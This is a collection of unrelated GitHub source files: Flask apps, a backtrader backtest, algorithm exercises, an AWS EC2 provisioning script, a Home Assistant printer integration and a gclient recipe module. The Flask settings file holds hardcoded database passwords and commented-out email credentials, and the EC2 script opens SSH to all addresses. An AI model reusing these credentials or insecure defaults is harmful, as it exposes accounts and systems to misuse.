category does not exist.')\n\n previous_questions = request.json.get('previous_questions', [])\n random_question = Question.get_random_question(previous_questions, category_id)\n\n response = {\n 'success': True,\n 'current_category': category_id\n }\n try:\n response['question'] = random_question.format()\n except AttributeError:\n response['question'] = None\n\n return jsonify(response)\n\n '''\n Error handlers\n '''\n\n @app.errorhandler(400)\n def resource_not_found(error):\n return jsonify({\n 'success': False,\n 'error': 400,\n 'message': error.description\n }), 400\n\n @app.errorhandler(404)\n def resource_not_found(error):\n return jsonify({\n 'success': False,\n 'error': 404,\n 'message': error.description\n }), 404\n\n @app.errorhandler(409)\n def resource_not_found(error):\n return jsonify({\n 'success': False,\n 'error': 409,\n 'message': error.description\n }), 409\n\n @app.errorhandler(422)\n def resource_not_found(error):\n return jsonify({\n 'success': False,\n 'error': 422,\n 'message': error.description\n }), 422\n\n @app.errorhandler(500)\n def resource_not_found(error):\n return jsonify({\n 'success': False,\n 'error': 500,\n 'message': error.description\n }), 500\n\n return app\n","repo_name":"csaba-schmidtmayer/trivia_api","sub_path":"backend/flaskr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15511864770","text":"import backtrader as bt\r\nimport talib\r\n\r\n\r\nclass RSIStrategy(bt.Strategy):\r\n\r\n def __init__(self):\r\n self.rsi = talib.RSI(self.data, period=14)\r\n\r\n # size = amount of coin to buy (etc. BTC)\r\n def next(self):\r\n if self.rsi < 30 and not self.position:\r\n self.buy(size=0.0000001)\r\n if self.rsi > 70 and self.position:\r\n self.close()\r\n\r\n\r\nclass SmaCross(bt.Strategy):\r\n # list of parameters which are configurable for the strategy\r\n params = dict(\r\n pfast=1, # period for the fast moving average\r\n pslow=270 # period for the slow moving average\r\n )\r\n\r\n def __init__(self):\r\n sma1 = bt.ind.SMA(period=self.p.pfast) # fast moving average\r\n sma2 = bt.ind.SMA(period=self.p.pslow) # slow moving average\r\n self.crossover = bt.ind.CrossOver(sma1, sma2) # crossover signal\r\n\r\n def next(self):\r\n if not self.position: # not in the market\r\n if self.crossover > 0: # if fast crosses slow to the upside\r\n self.buy(size=5.4) # enter long\r\n\r\n\r\n\r\n elif self.crossover < 0: # in the market & cross to the downside\r\n self.close() # close long position\r\n\r\n\r\ncerebro = bt.Cerebro()\r\n\r\ndata = bt.feeds.GenericCSVData(dataname='BNB_MIN.csv', dtformat=2)\r\n\r\ncerebro.adddata(data)\r\n\r\ncerebro.addstrategy(SmaCross)\r\n\r\ncerebro.run()\r\n\r\ncerebro.plot()\r\n","repo_name":"Izzy90/trading_bot","sub_path":"backtest.py","file_name":"backtest.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74965444324","text":"def get_db_uri(dbinfo):\n username = dbinfo.get('user') or \"root\"\n password = dbinfo.get('pwd') or \"111111\"\n host = dbinfo.get('host') or \"localhost\"\n port = dbinfo.get('port') or \"3306\"\n database = dbinfo.get('dbname') or \"Enjoythin\"\n driver = dbinfo.get('driver') or \"pymysql\"\n dialect = dbinfo.get('dialect') or \"mysql\"\n\n return \"{}+{}://{}:{}@{}:{}/{}\".format(dialect, driver, username, password, host, port, database)\n\n\nclass 
Config():\n    DEBUG = False\n    TESTING = False\n    SECRET_KEY = '110'\n    SESSION_TYPE = 'redis'\n    SQLALCHEMY_TRACK_MODIFICATIONS = False\n    DEBUG_TB_INTERCEPT_REDIRECTS = False\n\n\nclass DevelopConfig(Config):\n    DEBUG = True\n    # MAIL_SERVER = \"smtp.163.com\"\n    # MAIL_USERNAME = \"m18937610182@163.com\"\n    # MAIL_PASSWORD = \"19910320hu\"\n\n    DATABASE = {\n        \"user\": \"root\",\n        \"pwd\": \"111111\",\n        \"host\": \"127.0.0.1\",\n        \"port\": \"3306\",\n        \"dialect\": \"mysql\",\n        \"driver\": \"pymysql\",\n        \"dbname\": \"Enjoythin\",\n\n    }\n\n    SQLALCHEMY_DATABASE_URI = get_db_uri(DATABASE)\n\n\nclass TestingConfig(Config):\n    TESTING = True\n\n    DATABASE = {\n        \"user\": \"root\",\n        \"pwd\": \"111111\",\n        \"host\": \"127.0.0.1\",\n        \"port\": \"3306\",\n        \"dialect\": \"mysql\",\n        \"driver\": \"pymysql\",\n        \"dbname\": \"Enjoythin\",\n\n    }\n\n    SQLALCHEMY_DATABASE_URI = get_db_uri(DATABASE)\n\n\nclass ShowConfig(Config):\n    DEBUG = True\n\n    DATABASE = {\n        \"user\": \"root\",\n        \"pwd\": \"111111\",\n        \"host\": \"127.0.0.1\",\n        \"port\": \"3306\",\n        \"dialect\": \"mysql\",\n        \"driver\": \"pymysql\",\n        \"dbname\": \"Enjoythin\",\n\n    }\n\n    SQLALCHEMY_DATABASE_URI = get_db_uri(DATABASE)\n\n\nclass ProductConfig(Config):\n    DEBUG = True\n\n    DATABASE = {\n        \"user\": \"root\",\n        \"pwd\": \"111111\",\n        \"host\": \"127.0.0.1\",\n        \"port\": \"3306\",\n        \"dialect\": \"mysql\",\n        \"driver\": \"pymysql\",\n        \"dbname\": \"Enjoythin\",\n\n    }\n\n    SQLALCHEMY_DATABASE_URI = get_db_uri(DATABASE)\n\n\nconfig = {\n    \"developConfig\": DevelopConfig,\n    \"testingConfig\": TestingConfig,\n    \"showConfig\": ShowConfig,\n    \"productConfig\": ProductConfig,\n    \"default\": DevelopConfig,\n}\n","repo_name":"Developerbaby/enjoythin","sub_path":"App/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15630628358","text":"def get_length_longest_substring(s: str):\n    if len(s) == 0:\n        return 0\n\n    # sliding window: `start` marks the left edge of the current window of\n    # unique characters; on a repeat, shrink from the left past the duplicate\n    seen_chars = set()\n    start = 0\n    max_length = 1\n\n    for i in range(len(s)):\n        if s[i] in seen_chars:\n            while s[start] != s[i]:\n                seen_chars.remove(s[start])\n                start += 1\n            start += 1\n\n        if i + 1 - start > max_length:\n            max_length = i + 1 - start\n\n        seen_chars.add(s[i])\n\n    return max_length\n","repo_name":"JohnWebb4/toy_problems","sub_path":"src/longestSubstring/longestSubstring.py","file_name":"longestSubstring.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
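A few quick checks for the sliding-window function above (inputs invented for illustration):

```python
assert get_length_longest_substring("") == 0
assert get_length_longest_substring("bbbbb") == 1     # all duplicates
assert get_length_longest_substring("abcabcbb") == 3  # "abc"
assert get_length_longest_substring("pwwkew") == 3    # "wke"
```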
 +{"seq_id":"38518108596","text":"'''\r\nMoataz Khallaf A.K.A Hackerman\r\n03-recuBinSearch\r\n2/27/2019\r\n'''\r\nimport random\r\n\r\nli = [1, 2, 3, 4, 5, 15, 16, 17, 18, 19, 20, 30, 31, 32, 33, 34, 35, 36, 41, 42, 43, 43]\r\ndat = []\r\n\r\nfor i in range(500):\r\n\r\n    if random.randrange(2) == 1:\r\n        dat.append(i)\r\n\r\nnum = dat[random.randrange(len(dat))]\r\n\r\ndef binSearch(arr, value):\r\n    midpoint = len(arr)//2\r\n    if arr[midpoint] == value:\r\n        return arr[midpoint]  # return the matched value, not whatever sits at index 1\r\n    else:\r\n        if arr[midpoint] < value:\r\n            arr = arr[midpoint+1:]  # the midpoint was already checked, so exclude it\r\n        else:\r\n            arr = arr[:midpoint]\r\n        return binSearch(arr, value)\r\n\r\n\r\n\r\nprint(binSearch(dat, num))\r\n\r\n''' Mr.Zhang's method\r\ndef recBinSearch(li, val):\r\n    midP = (len(li)-1)//2\r\n    if li[midP] == val:\r\n        return li[midP]\r\n    if val < li[midP]:\r\n        return recBinSearch(li[:midP], val)\r\n    else:  # val > li[midP]\r\n        return recBinSearch(li[midP+1:], val)\r\n\r\n\r\n\r\n'''","repo_name":"taz717/CSE3310_lessons","sub_path":"03-recuBinSearch.py","file_name":"03-recuBinSearch.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40443199031","text":"import boto3\nimport paramiko\nimport time\nfrom botocore.exceptions import ClientError\nfrom os import path\n\n\nSECURITY_GROUP_NAME = 'BigDataProjectSecurityGroup'\nSECURITY_GROUP_DESCRIPTION = 'This is Security group for our BigData project'\nKEY_PAIR_FILE_NAME = 'BigDataProject-ec2-keypair'\nUSERNAME = 'ec2-user'\n\ndef initInstance() :\n    print(\"Starting init EC2 instance ...\")\n    key_pair_file_name = KEY_PAIR_FILE_NAME\n    instance_public_dns = createEc2Instance(key_pair_file_name)\n    client = connectInstance(key_pair_file_name, instance_public_dns)\n    installPackets(client)\n    sendEc2WorkerPythonFiles(client)\n    startEc2Worker(client)\n    \n    print(\"Init Ec2 instance done.\")\n    return client\n\n\ndef createEc2Instance(key_pair_file_name) :\n    ec2_ressource = boto3.resource('ec2')\n    ec2_client = boto3.client('ec2')\n\n    vpcs = ec2_client.describe_vpcs()\n    vpc_id = vpcs.get('Vpcs', [{}])[0].get('VpcId', '')\n    print('VpcId= %s' % vpc_id)\n\n    ###### Create ec2 key pair ######\n\n    # call the boto ec2 function to create a key pair\n    key_pair = ec2_ressource.create_key_pair(KeyName=key_pair_file_name)\n\n    # create a file to store the key locally\n    outfile = open(key_pair_file_name,'w')\n\n    # capture the key and store it in a file\n    KeyPairOut = str(key_pair.key_material)\n    print(KeyPairOut)\n    outfile.write(KeyPairOut)\n\n\n    ###### Create ec2 security group ######\n\n    try:\n        response = ec2_client.create_security_group(GroupName=SECURITY_GROUP_NAME,\n                                             Description=SECURITY_GROUP_DESCRIPTION,\n                                             VpcId=vpc_id)\n        security_group_id = response['GroupId']\n        print('Security Group Created %s in vpc %s.' 
% (security_group_id, vpc_id))\n\n data = ec2_client.authorize_security_group_ingress(\n GroupId=security_group_id,\n IpPermissions=[\n {'IpProtocol': 'tcp',\n 'FromPort': 80,\n 'ToPort': 80,\n 'IpRanges': [{'CidrIp': '0.0.0.0/0'}]},\n {'IpProtocol': 'tcp',\n 'FromPort': 22,\n 'ToPort': 22,\n 'IpRanges': [{'CidrIp': '0.0.0.0/0'}]}\n ])\n print('Ingress Successfully Set %s' % data)\n except ClientError as e:\n print(e)\n\n\n ###### Create ec2 instance ######\n\n instances = ec2_ressource.create_instances(\n ImageId='ami-0c94855ba95c71c99',\n MinCount=1,\n MaxCount=1,\n InstanceType='t2.large',\n KeyName=key_pair_file_name,\n SecurityGroupIds=[\n security_group_id\n ]\n )\n\n instance = instances[0]\n\n print('Wait until running instance ...')\n instance.wait_until_running()\n print('Wait until initializing instance ...')\n time.sleep(20)\n\n # Reload the instance attributes\n instance.load()\n\n instance_id = instance.id\n instance_public_dns = instance.public_dns_name\n print('public_dns=%s' % instance_public_dns)\n\n return instance_public_dns\n\n# Penser à client.close()\ndef connectInstance(key_pair_file_name, instance_public_dns) :\n\n key = paramiko.RSAKey.from_private_key_file(key_pair_file_name)\n client = paramiko.SSHClient()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n # Connect/ssh to an instance\n try:\n print(\"Try to connect to ec2 instance ...\")\n client.connect(hostname=instance_public_dns, username=USERNAME, pkey=key, timeout=30, auth_timeout=30)\n return client\n except Exception as e:\n print(e)\n\ndef installPythonPackage(client,name):\n print(\"Installing: \"+name+\"...\")\n stdin, stdout, stderr = client.exec_command('sudo python3 -m pip install '+name)\n print(\"E : %s / O : %s\" %(stderr.read(), stdout.read()))\n \n\ndef installPackets(client) :\n print(\"Installing: python3 ...\")\n stdin, stdout, stderr = client.exec_command('sudo yum install python3 -y')\n print(\"E : %s / O : %s\" %(stderr.read(), stdout.read()))\n installPythonPackage(client,\"scikit-learn\")\n installPythonPackage(client,\"nltk\")\n installPythonPackage(client,\"numpy\")\n installPythonPackage(client,\"re\")\n installPythonPackage(client,\"pandas\")\n\n \n \n\ndef sendEc2WorkerPythonFiles(client) :\n print(\"Sending Ec2 Worker Python Files ...\")\n ftp_client=client.open_sftp()\n\n local_home = path.expanduser(\"~\")\n remote_home = \"/home/\"+USERNAME\n\n ftp_client.put('../processing/trainingTFIDF.py',remote_home+'/trainingTFIDF.py')\n ftp_client.put('../processing/utils.py',remote_home+'/utils.py')\n ftp_client.put('../processing/data.json',remote_home+'/data.json')\n ftp_client.put('../processing/label.csv',remote_home+'/label.csv')\n ftp_client.put('../processing/categories_string.csv',remote_home+'/categories_string.csv')\n\n\n ftp_client.close()\n print(\"Done sending all worker files.\")\n\ndef startEc2Worker(client) :\n print(\"Starting ec2 worker ...\")\n\n stdin, stdout, stderr = client.exec_command('python3 trainingTFIDF.py')\n print(\"E : %s / O : %s\" %(stderr.read(), stdout.read()))\n \n print(\"Starting ec2 worker ...\")\n\n\ndef fetchPredictFile(client):\n ftp_client=client.open_sftp()\n local_home = path.expanduser(\"~\")\n remote_home = \"/home/\"+USERNAME\n\n ftp_client.get(remote_home+'/predict.csv', '../result/predict.csv')\n ftp_client.close()\n print(\"Done fetching all worker files.\")\n\nif __name__ == \"__main__\":\n\n client=initInstance()\n \n fetchPredictFile(client)\n \n client.close()\n 
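One design note on the EC2 bring-up above: the fixed `time.sleep(20)` after `wait_until_running()` can still race instance initialization. A hedged sketch of a waiter-based alternative (assuming the same `instance` object from `create_instances`; this is not part of the original file):

```python
import boto3

# Poll until the instance passes both EC2 status checks instead of sleeping
# for a fixed 20 seconds; wait() blocks, re-polling every ~15 seconds.
ec2_client = boto3.client('ec2')
waiter = ec2_client.get_waiter('instance_status_ok')
waiter.wait(InstanceIds=[instance.id])
```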
\n\n\n","repo_name":"AGENTHON/ProjetBigData","sub_path":"aws/initEc2Instance.py","file_name":"initEc2Instance.py","file_ext":"py","file_size_in_byte":5523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33861172442","text":"\"\"\"\n57. Insert Interval\nhttps://leetcode.com/problems/insert-interval/\n\nGiven a set of non-overlapping intervals, insert a new interval into the intervals (merge if necessary).\n\nYou may assume that the intervals were initially sorted according to their start times.\n\nExample 1:\n\nInput: intervals = [[1,3],[6,9]], newInterval = [2,5]\nOutput: [[1,5],[6,9]]\nExample 2:\n\nInput: intervals = [[1,2],[3,5],[6,7],[8,10],[12,16]], newInterval = [4,8]\nOutput: [[1,2],[3,10],[12,16]]\nExplanation: Because the new interval [4,8] overlaps with [3,5],[6,7],[8,10].\n\n\"\"\"\n\nclass Solution:\n def insert(self, intervals: List[List[int]], newInterval: List[int]) -> List[List[int]]:\n res, n = [], newInterval \n for index, i in enumerate(intervals):\n if i[1] < n[0]:\n res.append(i) \n elif n[1] < i[0]:\n res.append(n)\n return res+intervals[index:]\n else:\n n[0] = min(n[0], i[0])\n n[1] = max(n[1], i[1]) \n res.append(n)\n return res\n \n \n\n","repo_name":"EvanTian233/Leetcode-solutions","sub_path":"Python_Solutions/Algorithms/1_2_SlidingWindow/InsertInterval.py","file_name":"InsertInterval.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39804977787","text":"import pdb\nfrom models.author import Author\nfrom models.book import Book\nimport repositories.author_repository as author_repository\nimport repositories.book_repository as book_repository\n\nbook_repository.delete_all()\nauthor_repository.delete_all()\n\n\nauthor_1 = Author(\"J.K\", \"Rowling\")\nauthor_repository.save(author_1)\n\nauthor_2 = Author(\"Stephen\", \"King\")\nauthor_repository.save(author_2)\n\nbook_1 = Book(\"The Philosopher's Stone\", \"Fantasy\", author_1)\nbook_repository.save(book_1)\n\nbook_2 = Book(\"The Chamber of Secrets\", \"Fantasy\", author_1)\nbook_repository.save(book_2)\n\nbook_3 = Book(\"The Prisoner of Azkaban\", \"Fantasy\", author_1)\nbook_repository.save(book_3)\n\nbook_4 = Book(\"Misery\", \"Horror\", author_2)\nbook_repository.save(book_4)\n","repo_name":"JoshMcc1/week_4_day_3","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36359819378","text":"\"\"\"\nSupport for HP Printer.\nFor more details about this platform, please refer to the documentation at\nhttps://home-assistant.io/components/hpprinter/\n\"\"\"\nfrom datetime import datetime, timedelta\nimport logging\nimport sys\nfrom typing import Optional\n\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.dispatcher import async_dispatcher_send\nfrom homeassistant.helpers.entity_registry import EntityRegistry, async_get\nfrom homeassistant.helpers.event import async_track_time_interval\n\nfrom ..helpers.const import *\nfrom ..managers.HPDeviceData import HPDeviceData\nfrom ..managers.configuration_manager import ConfigManager\nfrom ..managers.device_manager import DeviceManager\nfrom ..managers.entity_manager import EntityManager\nfrom ..models.config_data import ConfigData\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass 
HPPrinterHomeAssistant:\n def __init__(self, hass: HomeAssistant):\n self._hass = hass\n\n self._remove_async_track_time = None\n\n self._is_initialized = False\n self._is_updating = False\n\n self._entity_registry = None\n\n self._api = None\n self._entity_manager = None\n self._device_manager = None\n self._data_manager = None\n\n self._config_manager = ConfigManager()\n\n def update_entities(now):\n self._hass.async_create_task(self.async_update(now))\n\n self._update_entities = update_entities\n\n @property\n def data(self):\n return self._data_manager.device_data\n\n @property\n def data_manager(self) -> HPDeviceData:\n return self._data_manager\n\n @property\n def entity_manager(self) -> EntityManager:\n return self._entity_manager\n\n @property\n def device_manager(self) -> DeviceManager:\n return self._device_manager\n\n @property\n def entity_registry(self) -> EntityRegistry:\n return self._entity_registry\n\n @property\n def config_data(self) -> Optional[ConfigData]:\n if self._config_manager is not None:\n return self._config_manager.data\n\n return None\n\n async def async_init(self, entry: ConfigEntry):\n try:\n self._config_manager.update(entry)\n\n self._data_manager = HPDeviceData(self._hass, self._config_manager)\n self._entity_manager = EntityManager(self._hass, self)\n self._device_manager = DeviceManager(self._hass, self)\n\n self._hass.loop.create_task(self._async_init())\n except Exception as ex:\n exc_type, exc_obj, tb = sys.exc_info()\n line_number = tb.tb_lineno\n\n _LOGGER.error(f\"Failed to async_init, error: {ex}, line: {line_number}\")\n\n async def _async_init(self):\n await self._data_manager.initialize()\n\n self._entity_registry = async_get(self._hass)\n\n load = self._hass.config_entries.async_forward_entry_setup\n\n for domain in SIGNALS:\n await load(self._config_manager.config_entry, domain)\n\n self._is_initialized = True\n\n await self.async_update_entry()\n\n async def async_update_entry(self, entry: ConfigEntry = None):\n _LOGGER.debug(\"Updating config entry\")\n\n is_update = entry is not None\n\n if is_update:\n _LOGGER.info(f\"Handling ConfigEntry change: {entry.as_dict()}\")\n\n previous_interval = self.config_data.update_interval\n\n self._config_manager.update(entry)\n\n current_interval = self.config_data.update_interval\n\n is_interval_changed = previous_interval != current_interval\n\n if is_interval_changed and self._remove_async_track_time is not None:\n msg = f\"ConfigEntry interval changed from {previous_interval} to {current_interval}\"\n _LOGGER.info(msg)\n\n self._remove_async_track_time()\n self._remove_async_track_time = None\n else:\n entry = self._config_manager.config_entry\n\n _LOGGER.info(f\"Handling ConfigEntry initialization: {entry.as_dict()}\")\n\n current_interval = self.config_data.update_interval\n\n if self._remove_async_track_time is None:\n interval = timedelta(seconds=current_interval)\n\n self._remove_async_track_time = async_track_time_interval(\n self._hass, self._update_entities, interval\n )\n\n await self.async_update(datetime.now())\n\n async def async_remove(self):\n config_entry = self._config_manager.config_entry\n _LOGGER.info(f\"Removing current integration - {config_entry.title}\")\n\n if self._remove_async_track_time is not None:\n self._remove_async_track_time()\n self._remove_async_track_time = None\n\n unload = self._hass.config_entries.async_forward_entry_unload\n\n for domain in SIGNALS:\n await unload(config_entry, domain)\n\n await self._device_manager.async_remove()\n\n _LOGGER.info(f\"Current 
integration ({config_entry.title}) removed\")\n\n async def async_update(self, event_time):\n if not self._is_initialized:\n _LOGGER.info(f\"NOT INITIALIZED - Failed updating @{event_time}\")\n return\n\n try:\n if self._is_updating:\n _LOGGER.debug(f\"Skip updating @{event_time}\")\n return\n\n _LOGGER.debug(f\"Updating @{event_time}\")\n\n self._is_updating = True\n\n await self.data_manager.update()\n\n self.device_manager.update()\n self.entity_manager.update()\n\n await self.dispatch_all()\n except Exception as ex:\n exc_type, exc_obj, tb = sys.exc_info()\n line_number = tb.tb_lineno\n\n _LOGGER.error(f\"Failed to async_update, Error: {ex}, Line: {line_number}\")\n\n self._is_updating = False\n\n async def delete_entity(self, domain, name):\n try:\n entity = self.entity_manager.get_entity(domain, name)\n device_name = entity.device_name\n unique_id = entity.unique_id\n\n self.entity_manager.delete_entity(domain, name)\n\n device_in_use = self.entity_manager.is_device_name_in_use(device_name)\n\n entity_id = self.entity_registry.async_get_entity_id(\n domain, DOMAIN, unique_id\n )\n self.entity_registry.async_remove(entity_id)\n\n if not device_in_use:\n await self.device_manager.delete_device(device_name)\n except Exception as ex:\n exc_type, exc_obj, tb = sys.exc_info()\n line_number = tb.tb_lineno\n\n _LOGGER.error(f\"Failed to delete_entity, Error: {ex}, Line: {line_number}\")\n\n async def dispatch_all(self):\n if not self._is_initialized:\n _LOGGER.info(f\"NOT INITIALIZED - Failed discovering components\")\n return\n\n for domain in SIGNALS:\n signal = SIGNALS.get(domain)\n\n async_dispatcher_send(self._hass, signal)\n","repo_name":"elad-bar/ha-hpprinter","sub_path":"custom_components/hpprinter/managers/home_assistant.py","file_name":"home_assistant.py","file_ext":"py","file_size_in_byte":7008,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"52"} +{"seq_id":"19712899728","text":"'''Crie uma função que verifica se uma senha é forte ou fraca, sendo:\naté 5 caracteres > fraca\nletras e números > forte\nletras, numeros e pontuação > muito forte'''\n\nimport string\n\ndef caracteres_senha(sen):\n letras = any(a.isalpha() for a in sen)\n numero = any(a.isdigit() for a in sen)\n pontuacao = any(a in string.punctuation for a in sen)\n \n if letras and numero and pontuacao:\n return \"Sua senha é muito forte\"\n elif letras and numero:\n return \"Sua senha é forte\"\n elif letras:\n return \"Sua senha é fraca\"\n else:\n return \"Sua senha deve conter letras e números.\"\n \ndef nivel_senha(s):\n if len(s) < 5:\n print(\"Sua senha é fraca\")\n else:\n mensagem = caracteres_senha(s)\n print(mensagem)\n \nsenha = input(\"Digite sua senha: \")\n\nnivel_senha(senha)","repo_name":"izabelarc/backend","sub_path":"funções/exercicio8.py","file_name":"exercicio8.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12546855395","text":"from recipe_engine import recipe_api\n\n\nclass RevisionResolver(object):\n \"\"\"Resolves the revision based on build properties.\"\"\"\n\n def resolve(self, properties): # pragma: no cover\n raise NotImplementedError()\n\n\nclass RevisionFallbackChain(RevisionResolver):\n \"\"\"Specify that a given project's sync revision follows the fallback chain.\"\"\"\n def __init__(self, default=None):\n self._default = default\n\n def resolve(self, properties):\n \"\"\"Resolve the revision via the revision fallback chain.\n\n If 
the given revision was set using the revision_fallback_chain() function,\n this function will follow the chain, looking at relevant build properties\n until it finds one set or reaches the end of the chain and returns the\n default. If the given revision was not set using revision_fallback_chain(),\n this function just returns it as-is.\n \"\"\"\n return (properties.get('parent_got_revision') or\n properties.get('orig_revision') or\n properties.get('revision') or\n self._default)\n\n\ndef jsonish_to_python(spec, is_top=False):\n \"\"\"Turn a json spec into a python parsable object.\n\n This exists because Gclient specs, while resembling json, is actually\n ingested using a python \"eval()\". Therefore a bit of plumming is required\n to turn our newly constructed Gclient spec into a gclient-readable spec.\n \"\"\"\n ret = ''\n if is_top: # We're the 'top' level, so treat this dict as a suite.\n ret = '\\n'.join(\n '%s = %s' % (k, jsonish_to_python(spec[k])) for k in sorted(spec)\n )\n else:\n if isinstance(spec, dict):\n ret += '{'\n ret += ', '.join(\n \"%s: %s\" % (repr(str(k)), jsonish_to_python(spec[k]))\n for k in sorted(spec)\n )\n ret += '}'\n elif isinstance(spec, list):\n ret += '['\n ret += ', '.join(jsonish_to_python(x) for x in spec)\n ret += ']'\n elif isinstance(spec, basestring):\n ret = repr(str(spec))\n else:\n ret = repr(spec)\n return ret\n\nclass GclientApi(recipe_api.RecipeApi):\n # Singleton object to indicate to checkout() that we should run a revert if\n # we detect that we're on the tryserver.\n RevertOnTryserver = object()\n\n def __init__(self, **kwargs):\n super(GclientApi, self).__init__(**kwargs)\n self.USE_MIRROR = None\n self._spec_alias = None\n\n def __call__(self, name, cmd, infra_step=True, **kwargs):\n \"\"\"Wrapper for easy calling of gclient steps.\"\"\"\n assert isinstance(cmd, (list, tuple))\n prefix = 'gclient '\n if self.spec_alias:\n prefix = ('[spec: %s] ' % self.spec_alias) + prefix\n\n # TODO(phajdan.jr): create a helper for adding to PATH.\n env = self.m.context.env\n env.setdefault('PATH', '%(PATH)s')\n env['PATH'] = self.m.path.pathsep.join([\n env['PATH'], str(self._module.PACKAGE_REPO_ROOT)])\n\n with self.m.context(env=env):\n return self.m.python(prefix + name,\n self.package_repo_resource('gclient.py'),\n cmd,\n infra_step=infra_step,\n **kwargs)\n\n @property\n def use_mirror(self):\n \"\"\"Indicates if gclient will use mirrors in its configuration.\"\"\"\n if self.USE_MIRROR is None:\n self.USE_MIRROR = self.m.properties.get('use_mirror', True)\n return self.USE_MIRROR\n\n @use_mirror.setter\n def use_mirror(self, val): # pragma: no cover\n self.USE_MIRROR = val\n\n @property\n def spec_alias(self):\n \"\"\"Optional name for the current spec for step naming.\"\"\"\n return self._spec_alias\n\n @spec_alias.setter\n def spec_alias(self, name):\n self._spec_alias = name\n\n @spec_alias.deleter\n def spec_alias(self):\n self._spec_alias = None\n\n def get_config_defaults(self):\n return {\n 'USE_MIRROR': self.use_mirror,\n 'CACHE_DIR': self.m.infra_paths.default_git_cache_dir,\n }\n\n @staticmethod\n def config_to_pythonish(cfg):\n return jsonish_to_python(cfg.as_jsonish(), True)\n\n # TODO(machenbach): Remove this method when the old mapping is deprecated.\n @staticmethod\n def got_revision_reverse_mapping(cfg):\n \"\"\"Returns the merged got_revision_reverse_mapping.\n\n Returns (dict): A mapping from property name -> project name. 
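(For a hypothetical project this could look like {'got_foo_revision': 'src/foo'}.) 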
It merges the\n values of the deprecated got_revision_mapping and the new\n got_revision_reverse_mapping.\n \"\"\"\n rev_map = cfg.got_revision_mapping.as_jsonish()\n reverse_rev_map = cfg.got_revision_reverse_mapping.as_jsonish()\n combined_length = len(rev_map) + len(reverse_rev_map)\n reverse_rev_map.update({v: k for k, v in rev_map.iteritems()})\n\n # Make sure we never have duplicate values in the old map.\n assert combined_length == len(reverse_rev_map)\n return reverse_rev_map\n\n def resolve_revision(self, revision):\n if hasattr(revision, 'resolve'):\n return revision.resolve(self.m.properties)\n return revision\n\n def sync(self, cfg, extra_sync_flags=None, **kwargs):\n revisions = []\n self.set_patch_project_revision(self.m.properties.get('patch_project'), cfg)\n for i, s in enumerate(cfg.solutions):\n if i == 0 and s.revision is None:\n s.revision = RevisionFallbackChain()\n\n if s.revision is not None and s.revision != '':\n fixed_revision = self.resolve_revision(s.revision)\n if fixed_revision:\n revisions.extend(['--revision', '%s@%s' % (s.name, fixed_revision)])\n\n for name, revision in sorted(cfg.revisions.items()):\n fixed_revision = self.resolve_revision(revision)\n if fixed_revision:\n revisions.extend(['--revision', '%s@%s' % (name, fixed_revision)])\n\n test_data_paths = set(self.got_revision_reverse_mapping(cfg).values() +\n [s.name for s in cfg.solutions])\n step_test_data = lambda: (\n self.test_api.output_json(test_data_paths))\n try:\n # clean() isn't used because the gclient sync flags passed in checkout()\n # do much the same thing, and they're more correct than doing a separate\n # 'gclient revert' because it makes sure the other args are correct when\n # a repo was deleted and needs to be re-cloned (notably\n # --with_branch_heads), whereas 'revert' uses default args for clone\n # operations.\n #\n # TODO(mmoss): To be like current official builders, this step could\n # just delete the whole /build/ directory and start each\n # build from scratch. That might be the least bad solution, at least\n # until we have a reliable gclient method to produce a pristine working\n # dir for git-based builds (e.g. maybe some combination of 'git\n # reset/clean -fx' and removing the 'out' directory).\n j = '-j2' if self.m.platform.is_win else '-j8'\n args = ['sync', '--verbose', '--nohooks', j, '--reset', '--force',\n '--upstream', '--no-nag-max', '--with_branch_heads',\n '--with_tags']\n args.extend(extra_sync_flags or [])\n if cfg.delete_unversioned_trees:\n args.append('--delete_unversioned_trees')\n self('sync', args + revisions +\n ['--output-json', self.m.json.output()],\n step_test_data=step_test_data,\n **kwargs)\n finally:\n result = self.m.step.active_result\n solutions = result.json.output['solutions']\n for propname, path in sorted(\n self.got_revision_reverse_mapping(cfg).iteritems()):\n # gclient json paths always end with a slash\n info = solutions.get(path + '/') or solutions.get(path)\n if info:\n result.presentation.properties[propname] = info['revision']\n\n return result\n\n def inject_parent_got_revision(self, gclient_config=None, override=False):\n \"\"\"Match gclient config to build revisions obtained from build_properties.\n\n Args:\n gclient_config (gclient config object) - The config to manipulate. 
